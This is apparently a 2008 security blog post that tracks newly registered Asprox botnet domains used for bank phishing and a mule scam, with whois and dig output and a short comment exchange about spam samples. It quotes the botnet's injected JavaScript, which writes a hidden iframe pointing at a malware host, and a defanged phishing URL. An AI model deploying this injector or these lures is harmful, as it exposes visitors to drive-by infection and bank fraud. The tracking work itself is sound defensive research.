Asprox domains registered on August 29

August 30, 2008 - 12:19 — Rune

Both .su and .ru domains. The .su domains are the ones being heavily spammed for the bank phishing set up.
One example is h||p://ww3.associatedbank.com.app2. su/web_bank/confirm.asp

The "infection script" script.js now looks like this:
if(navigator.userAgent.indexOf('AntivirXP08')==-1){ document.write("<iframe src=h||p://oc32. ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>"); }
There we have a connection to the malware again.

The "NESCO Accounting & Finance" mule scam is still at the root level of the domains/ip.

Domain list:
.su:
app2.su, app4.su, app7.su, cfm7.su, dll1.su, dll5.su, form2.su, form6.su, page7.su, sid3.su, sid8.su, ssl2.su,

.ru:
2b24.ru, cg33.ru, cv2e.ru, cv32.ru, mc2n.ru, mj5f.ru, oc32.ru, vswc.ru

Example whois:

domain:     APP2.SU
nserver:    ns1.app2.su. 70.154.82.100
nserver:    ns2.app2.su. 75.67.216.154
nserver:    ns3.app2.su. 142.137.20.137
state:      REGISTERED, DELEGATED
person:     Private Person
phone:      +7 495 1199111
fax-no:     +7 495 1199111
e-mail:     sdtttg@hotmail.com
registrar:  NAUNET-REG-FID
created:    2008.08.27
paid-till:  2009.08.27
source:     FID

; <<>> DiG 9.3.5-P1 <<>> app2.su
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35955
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 3, ADDITIONAL: 0

;; QUESTION SECTION:
;app2.su.                       IN      A

;; ANSWER SECTION:
app2.su.                600     IN      A       75.140.17.43
app2.su.                600     IN      A       76.122.164.201
app2.su.                600     IN      A       85.65.225.115
app2.su.                600     IN      A       85.69.73.56
app2.su.                600     IN      A       85.87.31.54
app2.su.                600     IN      A       88.2.47.117
app2.su.                600     IN      A       99.149.62.82
app2.su.                600     IN      A       121.96.235.152
app2.su.                600     IN      A       121.150.131.120
app2.su.                600     IN      A       123.192.188.75
app2.su.                600     IN      A       219.50.8.52
app2.su.                600     IN      A       12.214.195.151
app2.su.                600     IN      A       72.48.167.176
app2.su.                600     IN      A       75.64.193.157

;; AUTHORITY SECTION:
app2.su.                345600  IN      NS      ns3.app2.su.
app2.su.                345600  IN      NS      ns2.app2.su.
app2.su.                345600  IN      NS      ns1.app2.su.

;; Query time: 780 msec
;; SERVER: 217.13.7.140#53(217.13.7.140)
;; WHEN: Sat Aug 30 11:34:38 2008
;; MSG SIZE  rcvd: 303

Comments

August 31, 2008 - 12:45 — Justin Mason (not verified)

spamples?

hi -- thanks for tracking these.

Listen, if you have spam samples, could you post copies of those in full, too? it'd be useful for antispam rule development (I'm one of the SpamAssassin devs). Feel free to obfuscate spamtrap addrs of course...

August 31, 2008 - 13:40 — Rune

Re: spamples?

Hi
I am a bit reluctant to post full samples of spam. For various reasons.
If anyone is especially interested in some spam in specific, contact me instead.

Silent noise - about spam, trojans and other nasty stuff